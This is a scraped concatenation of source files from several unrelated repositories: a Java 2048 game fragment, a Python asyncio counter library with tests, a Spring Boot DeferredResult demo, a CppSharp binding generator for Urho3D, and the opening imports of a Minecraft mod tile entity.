case 2 : up(); break;
case 3 : down(); break;
}
}
public void autoMove() {
PriorityQueue<MoveEfficiency> queue = new PriorityQueue<>(4, Collections.reverseOrder());
queue.add(getMoveEfficiency(() -> right()));
queue.add(getMoveEfficiency(() -> up()));
queue.add(getMoveEfficiency(() -> down()));
queue.add(getMoveEfficiency(() -> left()));
queue.peek().getMove().move();
}
public boolean hasBoardChanged() {
Tile[][] lastBoard = previousStates.peek();
for (int i = 0; i < FIELD_WIDTH; i++) {
for (int j = 0; j < FIELD_WIDTH; j++) {
if (lastBoard[i][j].value != gameTiles[i][j].value) {
return true;
}
}
}
return false;
}
public MoveEfficiency getMoveEfficiency(Move move) {
move.move();
if (!hasBoardChanged()) {
rollback();
return new MoveEfficiency(-1, 0, move);
}
int emptyTilesCount = getEmptyTiles().size();
// for (int i = 0; i < FIELD_WIDTH; i++) {
// for (int j = 0; j < FIELD_WIDTH; j++) {
// if (gameTiles[i][j].isEmpty()) {
// emptyTilesCount++;
// }
// }
// }
MoveEfficiency moveEfficiency = new MoveEfficiency(emptyTilesCount, score, move);
rollback();
return moveEfficiency;
}
}
| 3a2d8e065b8f645dbb2e822422f27f3c34a91d34 | [
"Java"
] | 1 | Java | justignatoff/2048 | 79e744f4dbbc98bdfc14e0995d4d9098deab78e8 | 129fdd533d66a2d465771daad5eee5a264069bc6 |
refs/heads/master | <repo_name>arck1/aio-counter<file_sep>/README.md
Async counter with decrement after timeout (ttl)
> Python 3.7+
Install
-------
pip install git+https://github.com/arck1/aio-counter
Examples
-------
```
counter = AioCounter(max_count=10, start_count=0, ttl=1, loop=loop)
# try increment counter or wait
await counter.inc(value=1)
# try increment counter or raise exception
counter.inc_nowait(value=1)
# try decrement counter or raise exception
counter.dec_nowait(value=1)
# try decrement counter or wait
await counter.dec(value=1)
# try increment counter with value 2 which decrement back after 2 seconds or wait
await counter.inc(value=2, ttl=2)
# try increment counter with value 2 which decrement back after 2 seconds or raise exception
counter.inc_nowait(value=2, ttl=2)
```<file_sep>/tests/tests.py
import unittest
from asyncio import sleep
from async_unittest import TestCase
from aio_counter import AioCounter
from aio_counter.exceptions import AioCounterException
class TestAioCounter(TestCase):
TIK = float(0.3)
TAK = float(0.6)
TTL = int(1)
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.counter = AioCounter(loop=cls.loop)
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
cls.counter.close()
def setUp(self) -> None:
self.counter._count = 0
self.counter._incs.clear()
self.counter._decs.clear()
# close all handlers
self.counter.close()
self.counter._handlers.clear()
def tearDown(self) -> None:
self.counter.close()
async def test_dec(self):
assert self.counter.empty()
self.counter._loop.call_later(self.TIK, self.counter.inc_nowait)
assert self.counter.count == 0
# wait until delayed inc_nowait increment counter
count = await self.counter.dec()
assert count == 0
async def test_inc(self):
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count
assert self.counter.count == self.counter.max_count
self.counter._loop.call_later(self.TIK, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count
# wait until delayed dec_nowait decrement counter
count = await self.counter.inc()
assert count == self.counter.max_count
def test_dec_nowait(self):
assert self.counter.empty()
try:
self.counter.dec_nowait()
except AioCounterException as e:
assert e
else:
assert False
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
def test_inc_nowait(self):
assert self.counter.empty()
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
# fill counter
self.counter._count = self.counter.max_count
try:
self.counter.inc_nowait()
except AioCounterException as e:
assert e
else:
assert False
async def test_ttl_inc(self):
assert self.counter.empty()
# inc with ttl = TTL
await self.counter.inc(self.TTL)
assert self.counter.count == 1
# sleep and inc() should run in one loop
await sleep(self.TTL, loop=self.loop)
# check if count was dec
assert self.counter.count == 0
async def test_bulk_inc(self):
"""
inc() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count - 1
assert self.counter.count == self.counter.max_count - 1
def delayed_check(counter):
assert counter.count == counter.max_count - 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count - 1
await self.counter.inc(value=2)
assert self.counter.count == self.counter.max_count
async def test_bulk_dec(self):
"""
dec() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
await self.counter.inc()
assert self.counter.count == 1
def delayed_check(counter):
assert counter.count == 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.inc_nowait)
assert self.counter.count == 1
await self.counter.dec(value=2)
assert self.counter.empty()
async def test_ttl_after_dec(self):
assert self.counter.empty()
await self.counter.inc(self.TTL)
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
await sleep(self.TTL, loop=self.loop)
if __name__ == '__main__':
unittest.main()
<file_sep>/examples/example.py
import asyncio
import time
from aio_counter import AioCounter
async def with_ttl(loop):
counter = AioCounter(max_count=10, start_count=2, ttl=1, loop=loop)
print(counter.count)
print(time.monotonic())
for _ in range(100):
await counter.inc(value=1)
print(time.monotonic())
async def without_ttl(loop):
counter = AioCounter(max_count=10, start_count=2, ttl=None, loop=loop)
# try increment counter or wait
await counter.inc(value=1)
# try increment counter or raise exception
counter.inc_nowait(value=1)
# try decrement counter or raise exception
counter.dec_nowait(value=1)
# try decrement counter or wait
await counter.dec(value=1)
async def main(loop):
await with_ttl(loop)
await without_ttl(loop)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main(loop))
<file_sep>/setup.py
import setuptools
from setuptools import setup, find_packages
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
version = '0.1'
setup(
name='aio-counter',
version=version,
author='arck1',
author_email='<EMAIL>',
description="Async counter with decrement after timeout (ttl)",
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/arck1/aio-counter',
download_url='https://github.com/arck1/aio-counter/archive/v{}.zip'.format(
version
),
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.7',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: Implementation :: CPython',
],
zip_safe=False,
python_requires='>=3.7',
packages=find_packages(exclude=["examples", "tests"]),
keywords='aio asyncio counter inc dec increment decrement ttl'
)
<file_sep>/aio_counter/__init__.py
from .counter import AioCounter
name = "aio-counter"
author = "arck1"<file_sep>/aio_counter/exceptions.py
class AioCounterException(Exception):
pass
<file_sep>/aio_counter/counter.py
import asyncio
import collections
import uuid
from typing import Optional, Union
from .exceptions import AioCounterException
class AioCounter:
_MAX_COUNT = 100
_TTL = 5
def __init__(self, max_count: Optional[int] = None, start_count: int = 0, ttl: Optional[int] = _TTL,
loop=None):
"""
Control request rate per period
:param max_count:
:param start_count:
:param ttl:
:param loop:
"""
if max_count is None:
max_count = self._MAX_COUNT
if max_count is None or max_count <= 0:
raise ValueError(f"max_count: int should be positive integer value, not {str(max_count)}")
if loop is None:
loop = asyncio.get_event_loop()
self._loop = loop
self._count = start_count
self._max_count = max_count or AioCounter._MAX_COUNT
self._ttl = ttl or AioCounter._TTL
# Futures.
self._incs = collections.deque()
# Futures.
self._decs = collections.deque()
self._handlers = {}
@property
def count(self) -> int:
"""
Return AioCounter current value
:return:
"""
return self._count
@property
def max_count(self) -> int:
"""
Return AioCounter max_count value
:return:
"""
return self._max_count
def _wakeup_next(self, waiters: collections.deque):
"""
Wake up the next waiter (if any) that isn't cancelled.
:param waiters:
:return:
"""
while waiters:
waiter = waiters.popleft()
if not waiter.done():
waiter.set_result(None)
break
def normalize(self):
"""
If counter not initialize or broken
:return:
"""
if self._count is None:
self._count = 0
"""
Check if self._count between 0 and self._max_count
"""
self._count = max(
min(self._count, self._max_count),
0
)
def empty(self) -> bool:
self.normalize()
return self.count <= 0
def full(self) -> bool:
self.normalize()
return self.count >= self._max_count
def can_dec(self, value: int = 1) -> bool:
return self.count >= max(0, value)
def can_inc(self, value: int = 1) -> bool:
return self.count + max(0, value) <= self._max_count
def get_key(self) -> str:
"""
Return key for callback
:return:
"""
return uuid.uuid4().hex
def cancel(self):
"""
Graceful shutdown and close handlers
:return:
"""
for key, handler in self._handlers.items():
try:
handler.cancel()
except:
pass
def close(self):
self.cancel()
def inc_nowait(self, ttl: Optional[int] = None, value: int = 1) -> int:
"""
Direct synchronous increment counter
:param ttl: Optional[int] - time to live in seconds, if None ttl = INF
:param value: int
:return:
"""
if self.full():
raise AioCounterException("Counter is full")
if value is None:
value = 1
if self._count + value > self._max_count:
raise AioCounterException(f"New counter value = {self._count + value} "
f"greater than max_count = {self._max_count}")
self._count += value
self._wakeup_next(self._decs)
ttl = ttl or self._ttl
if ttl is not None and ttl > 0:
key = self.get_key()
self._handlers[key] = self._loop.call_later(ttl, self.__dec_callback, key, value)
return self.count
def dec_nowait(self, value: int = 1) -> int:
"""
Direct synchronous decrement counter
:param value:
:return:
:raise AioCounterException if can't dec counter
"""
if self.empty():
raise AioCounterException("Counter is empty")
if value is None:
value = 1
if self._count - value < 0:
raise AioCounterException(f"New counter value = {self._count + value} "
f"less than Zero)")
self._count -= value
self._wakeup_next(self._incs)
return self.count
def __dec_callback(self, key, value: int = 1) -> int:
"""
Callback wrapper for dec counter after ttl
:param key:
:param value:
:return:
"""
try:
self.dec_nowait(value=value)
except:
pass
else:
handler = self._handlers.pop(key, None)
if handler is not None:
handler.cancel()
return 1
return 0
async def inc(self, ttl: Optional[int] = None, value: int = 1) -> int:
"""
Async increment of counter
If Counter is full(), wait free slots
:param ttl: seconds
:param value:
:return:
"""
while not self.can_inc(value=value):
incer = self._loop.create_future()
self._incs.append(incer)
try:
await incer
except:
incer.cancel() # Just in case incer is not done yet.
try:
# Clean self._incs from canceled incer.
self._incs.remove(incer)
except ValueError:
# The incer could be removed from self._incs by a
# previous inc_nowait call.
pass
if not self.full() and not incer.cancelled():
# We were woken up by inc_nowait(), but can't take
# the call. Wake up the next in line.
self._wakeup_next(self._incs)
raise
return self.inc_nowait(ttl=ttl, value=value)
async def dec(self, value: int = 1) -> int:
"""
Async decrement of counter
if counter is empty(), wait any increment
:param value:
:return:
"""
while not self.can_dec(value=value):
decer = self._loop.create_future()
self._decs.append(decer)
try:
await decer
except:
decer.cancel() # Just in case decer is not done yet.
try:
# Clean self._decs from canceled decer.
self._decs.remove(decer)
except ValueError:
# The decer could be removed from self._decs by a
# previous dec_nowait call.
pass
if not self.empty() and not decer.cancelled():
# We were woken up by dec_nowait(), but can't take
# the call. Wake up the next in line.
self._wakeup_next(self._decs)
raise
return self.dec_nowait(value=value)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.cancel()
| 0cca0221762eac04f497513f374a0224c41e713d | [
"Markdown",
"Python"
] | 7 | Markdown | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | 3dc6ebeb27120b0fc7437098450aa88411a4bead |
refs/heads/master | <file_sep>package com.fwtai.controller;
import com.fwtai.config.ResultResponse;
import com.fwtai.service.DeferredResultService;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.request.async.DeferredResult;
import javax.annotation.Resource;
/**
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-04-25 10:39
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 http://www.fwtai.com
*/
@RestController
@RequestMapping("deferred")
public class DeferredResultController{
@Resource
private DeferredResultService deferredResultService;
/**
* 为了方便测试,简单模拟一个
* 多个请求用同一个requestId会出问题
*/
private final String requestId = "haha";
// http://127.0.0.1:8030/deferred/get?timeout=8000
@GetMapping(value = "/get")
public DeferredResult<ResultResponse> get(@RequestParam(value = "timeout", required = false, defaultValue = "10000") Long timeout) {
DeferredResult<ResultResponse> deferredResult = new DeferredResult<>(timeout);
deferredResultService.process(requestId, deferredResult);
return deferredResult;
}
/** // http://127.0.0.1:8030/deferred/result?desired=失败
* 设置DeferredResult对象的result属性,模拟异步操作
* @param desired
* @return
*/
@GetMapping(value = "/result")
public String settingResult(@RequestParam(value = "desired", required = false, defaultValue = "成功") String desired) {
ResultResponse resultResponse = new ResultResponse();
if (ResultResponse.Msg.SUCCESS.getDesc().equals(desired)){
resultResponse.setCode(HttpStatus.OK.value());
resultResponse.setMsg(desired);
}else{
resultResponse.setCode(HttpStatus.INTERNAL_SERVER_ERROR.value());
resultResponse.setMsg(ResultResponse.Msg.FAILED.getDesc());
}
deferredResultService.settingResult(requestId,resultResponse);
return "Done";
}
}<file_sep>package com.fwtai.controller;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.CorsRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
/**
* WebMvc配置器|Bean配置
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-02-23 17:47
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 <url>http://www.yinlz.com</url>
*/
@Configuration
public class WebConfig implements WebMvcConfigurer{
//跨域请求
@Override
public void addCorsMappings(final CorsRegistry registry) {
registry.addMapping("/**")
.allowedOrigins("*")
.allowCredentials(true)
.allowedMethods("*")
.allowedHeaders("*")
.maxAge(3600L);
}
}<file_sep>package com.fwtai.controller;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.annotation.Resource;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
/**
* api接口
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-04-21 9:21
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 http://www.fwtai.com
*/
@RestController
@RequestMapping("api")
public class ApiController{
@Resource
private HttpServletRequest request;
// http://127.0.0.1:8030/api/login
@GetMapping("login")
public void login(final HttpServletResponse response){
final JSONObject json = new JSONObject();
final String password = request.getParameter("password");
json.put("age","18");
json.put("name","甜果果");
json.put("password",<PASSWORD>);
json.put("code",200);
json.put("msg","操作成功");
json.put("data","表格数据");
responseJson(json.toJSONString(),response);
}
public void responseJson(final String json,final HttpServletResponse response){
response.setContentType("text/html;charset=utf-8");
response.setHeader("Cache-Control","no-cache");
PrintWriter writer = null;
try {
writer = response.getWriter();
writer.write(String.valueOf(JSON.parse(json)));
writer.flush();
}catch (IOException e){
e.printStackTrace();
}finally{
if(writer != null){
writer.close();
writer = null;
}
}
}
} | 6ace1670284f49bea8ba9f9c194f3493dd1d399c | [
"Java"
] | 3 | Java | gzstyp/origin | c807a8f50a7357d090330d2277a207a993c02b5e | 67f0a5aa922449b37030fa13f6fcbcd58078c4c8 |
refs/heads/master | <file_sep>from scipy import stats
from math import log
def dist_log_loss(y_true, y_pred, labels=[]):
"""Log loss, aka logistic loss or cross-entropy loss.
For a single sample with true label yt in {0,1} and
estimated probability yp that yt = 1, the log loss is
-log P(yt|yp) = -(yt log(yp) + (1 - yt) log(1 - yp))
Parameters
----------
y_true : array-like or label indicator matrix
Ground truth (correct) labels for n_samples samples.
y_pred : array-like of float, shape = (n_samples, n_classes)
Predicted probabilities
labels : array-like, optional (default=None)
If not provided, labels will be inferred from y_true.
Returns
-------
loss : float
"""
losses = []
if len(labels):
for tr, prob in zip(y_true,y_pred):
pt = prob[labels.index(tr)]
losses.append(-log(pt))
else:
fit_labels = sorted(list(set(y_true)))
for tr, prob in zip(y_true,y_pred):
pt = prob[fit_labels.index(tr)]
losses.append(-log(pt))
d = stats.describe(losses)
return {'mean':d.mean, 'variance': d.variance, 'skewness':d.skewness, 'kurtosis':d.kurtosis}
<file_sep>"""Six different set of predictions with corresponding dist log losses"""
from function import dist_log_loss
lg5 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.5,.5],[.5,.5],[.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
lg7 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.7,.3],[.5,.5],[.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
lg9 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.9,.1],[.5,.5],[.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
lg92 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.9,.1],[.9,.1],[.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
lg97 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.9,.1],[.9,.1],[.7,.3], [.5,.5], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
lg979 = dist_log_loss(['q','w','q','w','w','q','q','q', 'w','q'], [[.9,.1],[.9,.1],[.7,.3], [.1,.9], [.5,.5], [.5,.5], [.5,.5], [.5,.5],[.5,.5],[.5,.5]])
ls = {'5_5':lg5, '7g':lg7, '9g':lg9, '9g9b':lg92, '9g9b7g':lg97, '9g9b7g9g':lg979}
print('\n\n')
for k in ls.keys():
print(k, '\t\t', ls[k])
# The result:
# 5_5 {'mean': 0.6931471805599453, 'variance': 0.0, 'skewness': 0.0, 'kurtosis': -3.0}
# 7g {'mean': 0.659499956897824, 'variance': 0.011321356601688145, 'skewness': -2.6666666666666674, 'kurtosis': 5.111111111111114}
# 9g {'mean': 0.6343685140697334, 'variance': 0.03454931634367559, 'skewness': -2.6666666666666674, 'kurtosis': 5.111111111111114}
# 9g9b {'mean': 0.7953123053131435, 'variance': 0.3146007144731806, 'skewness': 2.049197215806169, 'kurtosis': 3.721929588389468}
# 9g9b7g {'mean': 0.7616650816510221, 'variance': 0.33356112174828945, 'skewness': 2.010784111427777, 'kurtosis': 3.4917114339583613}
# 9g9b7g9g {'mean': 0.7028864151608103, 'variance': 0.37706019555161346, 'skewness': 1.833955183433394, 'kurtosis': 2.920378861340641}
# the first and the last prediction have the same mean ( same log loss) but different variance and skewness
<file_sep># dist_log_loss
A function for a descriptive log loss; not just the mean!
The log-loss function in scikit-learn returns the mean of the losses, not very informative.
The dist_log_loss function, implemented here, returns more stats
| c9f76f3971232b8122fdb1e1bc2e4ccf59b956ed | [
"Markdown",
"Python"
] | 3 | Python | dzahedia/dist_log_loss | 39c87cbcf82ce7588f5faeba769cb4fbb7d4f2bc | 2328fb4a6d722c625fcc24a0760ab55a31a2ad7f |
refs/heads/master | <file_sep>flake8
yapf
nose
mock
<file_sep>docker>=2.0.0,<4.*
six>=1.10.0<file_sep>import os
import unittest
import hyper_sh
SKIP_MESSAGE = 'Hyper integration tests are for local testing only.'
@unittest.skipIf(os.environ.get('TRAVIS') == 'true', SKIP_MESSAGE)
def test_list_images():
client = hyper_sh.from_env()
images = client.images.list()
assert len(images) != 0
@unittest.skipIf(os.environ.get('TRAVIS') == 'true', SKIP_MESSAGE)
def test_create_container():
client = hyper_sh.from_env()
container = client.containers.create('busybox')
container.remove(force=True)
<file_sep>Python client for Hyper.sh
==========================
.. image:: https://api.travis-ci.org/tardyp/hyper_sh.svg?branch=master
:alt: Build Status
A wrapper around docker-py_ to support Hyper's authentication system.
Hyper uses Amazon's
`Signature Version 4 <https://docs.aws.amazon.com/general/latest/gr/signature-version-4.html>`_
(dubbed AWS4) to authenticate against it's service. This library replaces's docker-py's auth
module with a patched version of requests-aws4auth_ AWS4.
Installation
============
::
pip install hyper_sh
Usage
=====
As hyper_sh is a wrapper around docker-py, the API is the same.
See the `docker-py documentaiton <https://docker-py.readthedocs.io>`_.
The default usage, via the hyper_sh.from_env helper function, will
automatically discover your Hyper configuration from environment
variables and the default config file location:
.. code-block:: python
import docker
client = docker.from_env()
print(client.images.list())
One area the Hyper client differs from the Docker client is in the loading
of config. The initializers of hyper_sh.Client and hyper_sh.APIClient
require a positional argument for the config.
This can be either the location of a Hyper config file:
.. code-block:: python
from hyper_sh import Client
client = Client('path/to/config.json')
print(client.images.list())
or a valid Hyper config object:
.. code-block:: python
from hyper_sh import Client
client = Client({'clouds': {
os.environ['HYPER_ENDPOINT']: {
'accesskey': os.environ['HYPER_ACCESSKEY'],
'secretkey': os.environ['HYPER_SECRETKEY']
}
}})
print(client.images.list())
API support
===========
Hyper doesn't support the full Docker API so some features of docker-py will not work. See the
`Hyper_ API documentaiton <https://docs.hyper.sh/Reference/API/2016-04-04%20[Ver.%201.23]/>`_
for details of their Docker API support (features not supported will be marked as IGNORED).
Conversely, Hyper has features that do not exist in the Docker API, and these are not currently
supported by hyper_sh.
.. _docker-py: https://github.com/docker/docker-py
.. _requests-aws4auth: https://github.com/sam-washington/requests-aws4auth<file_sep>import json
import logging
import os
try:
from urllib.parse import urlparse
except ImportError:
# Python < 3.0 compat
from urlparse import urlparse
from docker import APIClient as DockerAPIClient
from docker import DockerClient, auth as docker_auth
from .requests_aws4auth import AWS4Auth
log = logging.getLogger(__name__)
# The docker library performs config file validation before we can get
# to it, so we need to override the config filename. The hyper config
# is still a valid Docker config file, it just has an additional key.
docker_auth.DOCKER_CONFIG_FILENAME = os.path.join('.hyper', 'config.json')
class APIClient(DockerAPIClient):
# This is the Docker API version that Hyper currently
# supports. The docker library uses a higher API version
# by default so we need to set this explicity.
API_VERSION = '1.23'
DEFAULT_REGION = 'us-west-1'
def __init__(self, config, **kwargs):
self.config = config
clouds = config.get('clouds')
if not isinstance(clouds, dict):
log.debug('Invalid config')
raise RuntimeError('Invalid config')
cloud_list = list(clouds.items())
if len(cloud_list) != 1:
log.debug('Invalid config')
raise RuntimeError('Only one cloud is support in the config.')
url, self.creds = cloud_list[0]
url = urlparse(url)
# The default endpoint URL can contain a wildcard for the region
# subdomain so we need to make sure we replace that with a valid
# region when building the base_url.
base_url = 'https://{}'.format(url.netloc.replace('*', self.creds['region']))
super(APIClient, self).__init__(
base_url, version=APIClient.API_VERSION, tls=True, **kwargs)
self.auth = AWS4Auth(self.creds['accesskey'], self.creds['secretkey'],
self.creds['region'], 'hyper')
class Client(DockerClient):
DEFAULT_CONFIG_FILE = '~/.hyper/config.json'
@staticmethod
def config_object(endpoint, accesskey, secretkey, region):
return {
'clouds': {
endpoint: {
'accesskey': accesskey,
'secretkey': secretkey,
'region': region
}
}
}
@classmethod
def from_env(cls):
log.debug('Looking for auth config')
keys = ['HYPER_ENDPOINT', 'HYPER_ACCESSKEY', 'HYPER_SECRETKEY', 'HYPER_REGION']
endpoint, accesskey, secretkey, region = [os.environ.get(k) for k in keys]
# The common standard is for environment variables to be
# uppercase, but for backwards compatibility we need to
# check for lowercase variables as well.
if not (endpoint and accesskey and secretkey):
endpoint, accesskey, secretkey, region = [
os.environ.get(k.lower()) for k in keys
]
region = region if region else APIClient.DEFAULT_REGION
if endpoint and accesskey and secretkey:
config = cls.config_object(endpoint, accesskey, secretkey, region)
print('Found config in memory')
return cls(config=config)
log.debug('No auth config in memory - loading from filesystem')
# Config not found in environment variables.
default_config_file = os.path.expanduser(cls.DEFAULT_CONFIG_FILE)
if os.path.isfile(default_config_file):
# We don't read the file here as we allow the user to
# pass the location to a config file, or a config object
# during initialisation.
config = json.load(open(default_config_file))
print('Found config in default file.')
return cls(config=config)
if not (endpoint and accesskey and secretkey):
log.debug('No auth config found')
raise RuntimeError('Unable to guess config from default file or environment.')
def __init__(self, config, **kwargs):
# config = kwargs.get('config')
if isinstance(config, str):
# Assume config is a file path.
config = json.load(open(os.path.expanduser(config)))
if not isinstance(config, dict):
raise TypeError('Invalid config object')
self.api = APIClient(config, **kwargs)
from_env = Client.from_env
<file_sep># flake8: noqa
from .client import Client, APIClient, from_env
__title__ = 'hyper_sh'
<file_sep>import json
import os
from unittest import TestCase
try:
from unittest.mock import patch
except ImportError:
# Python < 3.3 compat
from mock import patch
from hyper_sh import Client, APIClient, from_env
config_path = os.path.join(os.path.dirname(__file__), 'hyper_config.json')
class TestConfig(TestCase):
@patch.object(os, 'environ', {})
@patch.object(Client, 'DEFAULT_CONFIG_FILE', 'no_file.json')
def test_invalid_path(self):
# Test no default file and no env vars.
with self.assertRaises(TypeError):
Client()
# Test file can't be found.
with self.assertRaises(IOError):
Client('no_file.json')
# Test invalid config.
with self.assertRaises(RuntimeError):
Client({})
# Test invalid clouds.
with self.assertRaises(RuntimeError):
Client({'clouds': {'a': {}, 'b': {}}})
def test_valid_config(self):
# Test with valid env vars.
with patch.object(
os, 'environ', {
'HYPER_ENDPOINT': 'tcp://us-west-1.hyper.sh:443',
'HYPER_ACCESSKEY': 'abc123',
'HYPER_SECRETKEY': '321cba'
}):
assert (isinstance(from_env(), Client))
# Test with valid config file.
assert (Client(config_path))
# Test with valid config object.
config = json.load(open(config_path))
assert (Client(config))
def test_lowercase_envvars(self):
# Test with valid env vars.
with patch.object(
os, 'environ', {
'hyper_endpoint': 'tcp://us-west-1.hyper.sh:443',
'hyper_accesskey': 'abc123',
'hyper_secretkey': '321cba'
}):
assert (isinstance(from_env(), Client))
def test_valid_base_url(self):
config = json.load(open(config_path))
api_client = APIClient(config=config)
# Test base_url correct.
assert (api_client.base_url == 'https://us-west-1.hyper.sh:443')
# Test base_url includes correct region.
endpoint = list(config['clouds'].keys())[0]
region_config = {
'clouds': {
'tcp://eu-central-1.hyper.sh:443': config['clouds'][endpoint]
}
}
api_client = APIClient(config=region_config)
assert (api_client.base_url == 'https://eu-central-1.hyper.sh:443')
def test_auth_has_config(self):
config = json.load(open(config_path))
clouds = list(config['clouds'].items())
endpoint, creds = clouds[0]
auth = APIClient(config).auth
# Test that all config values are present and correct.
assert (auth.access_id == creds['accesskey'])
assert (auth.signing_key.secret_key == creds['secretkey'])
assert (auth.region == creds['region'])
| dd03dc54da73710a32ca3c0c04358c23e3b07b2c | [
"Python",
"Text",
"reStructuredText"
] | 7 | Text | aequitas/hyper_sh | 8a4c52ac88fdcc052f3c008377bdf77e70c30904 | e3da35abe467eb05396db245bf0964860aba848b |
refs/heads/master | <repo_name>tritao/Urho3D<file_sep>/Bindings/Makefile
#CPPSHARP_DIR = CppSharp
CPPSHARP_DIR = /Users/joao/Dev/CppSharp/build/gmake/lib/Debug_x32
CPPSHARP_REFS = -r:$(CPPSHARP_DIR)/CppSharp.dll \
-r:$(CPPSHARP_DIR)/CppSharp.AST.dll \
-r:$(CPPSHARP_DIR)/CppSharp.Parser.CSharp.dll \
-r:$(CPPSHARP_DIR)/CppSharp.Generator.dll
NEWTONSOFT_DIR = Newtonsoft.Json.6.0.8/lib/net45
DEPS_REFS =
SRC_ROOT = ../..
TARGET_NAME = UrhoBindingsGen
TARGET_EXE = $(TARGET_NAME).exe
.stamp-clone:
@if [ ! -d $(CPPSHARP_DIR) ]; then \
git clone <EMAIL>:tritao/CppSharpBinaries.git $(CPPSHARP_DIR); \
touch $@; \
fi
.stamp-deps:
#nuget install Newtonsoft.Json
touch $@;
$(TARGET_EXE): .stamp-clone .stamp-deps UrhoBindingsGen.cs
mcs UrhoBindingsGen.cs $(CPPSHARP_REFS) $(DEPS_REFS)
gen: $(TARGET_EXE)
MONO_PATH=$(CPPSHARP_DIR) mono $(TARGET_EXE)
gen-proj:
$(CPPSHARP_DIR)/premake5 vs2012
clean:
rm $(TARGET_EXE)
all: $(TARGET_EXE)<file_sep>/Bindings/UrhoBindingsGen.cs
using CppSharp;
using CppSharp.AST;
using CppSharp.Passes;
using System;
using System.IO;
using System.Linq;
namespace Mono
{
class UrhoBindingsGen : ILibrary
{
public void Setup(Driver driver)
{
var options = driver.Options;
options.LibraryName = "Urho";
options.OutputDir = "Urho";
options.Verbose = false;
options.SetupXcode();
options.addIncludeDirs(Path.GetFullPath("../Source/Urho3D"));
options.Headers.Add("Engine/Application.h");
}
public void SetupPasses(Driver driver)
{
//driver.TranslationUnitPasses.AddPass(new ClearCommentsPass());
}
public void Preprocess(Driver driver, ASTContext ctx)
{
// Remove when CppSharp binaries are up-to-date.
//ctx.IgnoreClassWithName("VariantValue");
// Remove when comment bug is fixed.
//ctx.IgnoreClassWithName("HashBase");
}
public void Postprocess(Driver driver, ASTContext ctx)
{
}
static class Program
{
public static void Main(string[] args)
{
ConsoleDriver.Run(new UrhoBindingsGen());
}
}
}
class ClearCommentsPass : TranslationUnitPass
{
public override bool VisitDeclaration(Declaration decl)
{
//decl.Comment = null;
return false;
}
}
}
| ad824a7cbc50e35c18fb807ecdbfe87bbfe582a8 | [
"C#",
"Makefile"
] | 2 | Makefile | tritao/Urho3D | 05ed8f720d0f2e56e14829ff1f8371a7cc4818bb | 604babd94d9cb5c05f6020d1e1b027c22048299b |
refs/heads/master | <file_sep>package com.minecreatr.electricalengineering.common.tile;
import cofh.api.energy.EnergyStorage;
import cofh.api.energy.IEnergyProvider;
import cofh.api.energy.IEnergyReceiver;
import com.minecreatr.electricalengineering.ElectricalEngineering;
import com.minecreatr.electricalengineering.common.util.NBTUtil;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.inventory.IInventory;
import net.minecraft.inventory.ISidedInventory;
import net.minecraft.item.ItemStack;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.nbt.NBTTagList;
import net.minecraft.network.NetworkManager;
import net.minecraft.network.Packet;
import net.minecraft.network.play.server.S35PacketUpdateTileEntity;
import net.minecraft.server.gui.IUpdatePlayerListBox;
